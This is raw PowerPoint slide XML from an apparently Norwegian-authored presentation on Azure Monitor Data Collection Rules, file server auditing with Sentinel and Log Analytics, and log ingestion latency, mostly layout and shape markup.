              <a:rPr lang="nb-NO" sz="3200" b="1" dirty="0"/>
              <a:t>Marius Sandbu </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="3200" dirty="0"/>
              <a:t>Cloud Evangelist @ Sopra Steria</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NO" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rektangel: avrundede hjørner 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D632EFD4-61F6-8FA4-9CF7-FE0DC461FA47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3338641" y="3503742"/>
            <a:ext cx="5039582" cy="762384"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4668"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0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b-NO" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOTE: Features mentioned might be in preview and not available in all regions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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E2FAAA27-7655-1AA1-8662-3D5CDCAF8EFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2596423" y="4388931"/>
            <a:ext cx="6524017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nb-NO" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Don’t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>want</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to listen to my </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ramblings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>? Presentation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uploded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> here </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> 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3889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30565A5-B64D-0DBC-AAE6-B49DA38701E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="501963" y="523610"/>
            <a:ext cx="11223198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2800" dirty="0"/>
              <a:t>Data Collection Rules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48DC5F9-4B5C-082C-9AAE-232482082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980" y="1624542"/>
            <a:ext cx="8152258" cy="3690707"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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2CEA838-965C-F5C1-BD8E-5271174413B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493890" y="1373871"/>
            <a:ext cx="2908567" cy="859277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Defines </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>which data sources should be collected and where it should be sent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714A73E-6849-92A5-59E6-95D04C88CA59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="488185" y="2492505"/>
            <a:ext cx="2908567" cy="1061333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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Will automatically install Azure Monitor agent if scope has been assigned to a set of virtual machines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B82D32-97B5-F4C5-4DE7-D01F3C3A7B25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="494125" y="3834899"/>
            <a:ext cx="2908567" cy="859277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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dependency Agent/VM Insight will create its own DCR starting with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MSVMI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4DD470-63DF-C8BD-A150-95CFFDA5AD97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513226" y="4910267"/>
            <a:ext cx="2908567" cy="859277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DCR can apply to both Azure VMs and Arc VMs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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66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30565A5-B64D-0DBC-AAE6-B49DA38701E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463052" y="594947"/>
            <a:ext cx="11223198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2800" dirty="0"/>
              <a:t>Data Collection Rules – and definding sources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6C042769-7B2E-7C93-CC84-54C55129F7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5591" y="3543380"/>
            <a:ext cx="3199658" cy="1814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" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84EA1791-B85E-EB97-6DE2-8FC580B7C1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450" y="1781183"/>
            <a:ext cx="2812983" cy="1753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AFFADAD-CD17-C1F0-F73C-C3C33C28E6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2297" y="1776920"/>
            <a:ext cx="3215273" cy="312611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3D8138-2177-56BC-7ECC-4709D86D9D98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4857345" y="1361874"/>
            <a:ext cx="4429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>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Custom Event Log</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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33699B-8AB6-AB32-E1D2-2958A47A4F42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7928043" y="1365116"/>
            <a:ext cx="4429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>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Custom Performance Metrics</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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030DB2-99B7-B32F-B577-B54B866912B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2077" y="1816832"/>
            <a:ext cx="3393343" cy="298808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7F8F29-9FB1-BEC0-309E-9BF24E3FB523}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522052" y="1358631"/>
            <a:ext cx="4429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>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>DCR Rule for collection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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572F4A4-FB32-3C8B-205C-8BC52969D4C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675473" y="4804494"/>
            <a:ext cx="2908567" cy="859277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Be aware of the prefix here</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!* = All levels of logs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9074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4562A10-325E-0C80-B161-4F30A9F5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618" y="648349"/>
            <a:ext cx="10751504" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Use-case – How many are using fileserver X?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3075" name="Picture 3" descr="share4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAAE008C-1A97-654D-19EF-F4A6246D5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1257" y="1393893"/>
            <a:ext cx="8358975" cy="3818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kstSylinder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26DEA9CF-CFAC-14F3-CDEC-D22F5A1C813E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3030173" y="5382754"/>
            <a:ext cx="60977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>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Auditing Windows File Servers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> Azure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Sentinel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> / Log Analytics | Marius Sandbu (msandbu.org)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09754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02603B26-D71B-48AF-8478-EDA4F59EE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nb-NO" sz="3200" b="1" dirty="0"/>
              <a:t>Data Collection – Have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="3200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>patience</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="3200" b="1" dirty="0"/>
              <a:t>! </a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Pil: femkant 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81A774BA-B609-4405-A2E2-980B5631D016}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763676" y="4173588"/>
            <a:ext cx="1673678" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="homePlat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Agent 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30 seconds interval </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="1050" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="1050" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>performance metrics</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="1050" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="1050" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TimeGenerated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Pil: vinkeltegn 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F17C658A-17EB-48F4-91C7-7FFB1DB595AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1988316" y="4173588"/>
            <a:ext cx="1992087" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="chevro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Agent Upload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00" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (30 sec – 2 minutes)</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1600" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Pil: vinkeltegn 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C4EE0E3-77A8-45E1-AE03-565F5DA6F697}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1796375" y="3038753"/>
            <a:ext cx="2184030" cy="91440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Azure Diagnostics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00" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 – 15 Minutter</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1600" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Bildeforklaring: pil mot høyre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E3983F2-F921-4A93-8984-B8B317D9B9E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5670222" y="1920246"/>
            <a:ext cx="1414382" cy="3167743"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrowCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 27751"/>
              <a:gd name="adj2" fmla="val 25000"/>
              <a:gd name="adj3" fmla="val 20873"/>
              <a:gd name="adj4" fmla="val 709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400" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Surge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Protection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&lt;1 minutt</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="nb-NO" sz="1600" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Pil: vinkeltegn 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A4FA847-C2E8-4E8C-8444-8D1A522181CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3498710" y="4173588"/>
            <a:ext cx="2163536" cy="91440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Temporary Storage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50" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5-15 seconds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_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TimeReceived</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1050" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Pil: vinkeltegn 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD31D815-D421-4CA2-A340-6AA6F50A0BEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3498710" y="3038753"/>
            <a:ext cx="2163536" cy="91440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Temporary Storage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50" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5-15 seconds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_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TimeReceived</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1050" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Pil: vinkeltegn 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A9CF8CB-6150-4762-AC54-C0F0F72246E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1802861" y="1920245"/>
            <a:ext cx="2177544" cy="91440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3.Party Data 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00" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 Minutter</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1600" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Pil: vinkeltegn 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89C508E2-18B1-432D-A120-8FB2D3250F40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3498710" y="1920245"/>
            <a:ext cx="2163536" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="chevro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Temporary Storage </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="1050" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5- 15 seconds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_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TimeReceived</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1050" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Bildeforklaring: pil mot høyre 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A1DCD84-FB78-4B3A-AB34-880E98E21AF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7114162" y="1920246"/>
            <a:ext cx="2208881" cy="3167743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5359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Indexing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="685800"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1050" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;5 Minutter</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="nb-NO" sz="1600" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Magnetplate 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF4345A9-8B2C-4FE0-9EEF-82A9048C2F6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9330149" y="2768779"/>
            <a:ext cx="1322933" cy="1399898"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMagneticDisk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r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Log Analytics Workspace</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B70C996-44E7-4217-92A1-927803D3CB4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8723996" y="4836720"/>
            <a:ext cx="2562404" cy="948604"/>
            <a:chOff x="1922908" y="4922018"/>
            <a:chExt cx="2036256" cy="753824"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="20" name="Group 1246">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C1E01A3-92E3-4037-9C3B-2719CD42D83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440975" y="4922018"/>
              <a:ext cx="518189" cy="752705"/>
              <a:chOff x="4191001" y="11407776"/>
              <a:chExt cx="434975" cy="631825"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29" name="Freeform 673">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F53D3D3-EEC4-457A-9E32-61388B1598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02126" y="11566526"/>
                <a:ext cx="95250" cy="82550"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 115 w 231"/>
                  <a:gd name="T1" fmla="*/ 200 h 200"/>
                  <a:gd name="T2" fmla="*/ 0 w 231"/>
                  <a:gd name="T3" fmla="*/ 84 h 200"/>
                  <a:gd name="T4" fmla="*/ 115 w 231"/>
                  <a:gd name="T5" fmla="*/ 0 h 200"/>
                  <a:gd name="T6" fmla="*/ 231 w 231"/>
                  <a:gd name="T7" fmla="*/ 84 h 200"/>
                  <a:gd name="T8" fmla="*/ 115 w 231"/>
                  <a:gd name="T9" fmla="*/ 200 h 200"/>
                  <a:gd name="T10" fmla="*/ 115 w 231"/>
                  <a:gd name="T11" fmla="*/ 47 h 200"/>
                  <a:gd name="T12" fmla="*/ 47 w 231"/>
                  <a:gd name="T13" fmla="*/ 84 h 200"/>
                  <a:gd name="T14" fmla="*/ 115 w 231"/>
                  <a:gd name="T15" fmla="*/ 153 h 200"/>
                  <a:gd name="T16" fmla="*/ 184 w 231"/>
                  <a:gd name="T17" fmla="*/ 84 h 200"/>
                  <a:gd name="T18" fmla="*/ 115 w 231"/>
                  <a:gd name="T19" fmla="*/ 4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1" h="200">
                    <a:moveTo>
                      <a:pt x="115" y="200"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="200"/>
                      <a:pt x="0" y="148"/>
                      <a:pt x="0" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="14"/>
                      <a:pt x="18" y="0"/>
                      <a:pt x="115" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="212" y="0"/>
                      <a:pt x="231" y="14"/>
                      <a:pt x="231" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="231" y="148"/>
                      <a:pt x="179" y="200"/>
                      <a:pt x="115" y="200"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="115" y="47"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="47"/>
                      <a:pt x="47" y="47"/>
                      <a:pt x="47" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="122"/>
                      <a:pt x="77" y="153"/>
                      <a:pt x="115" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="153" y="153"/>
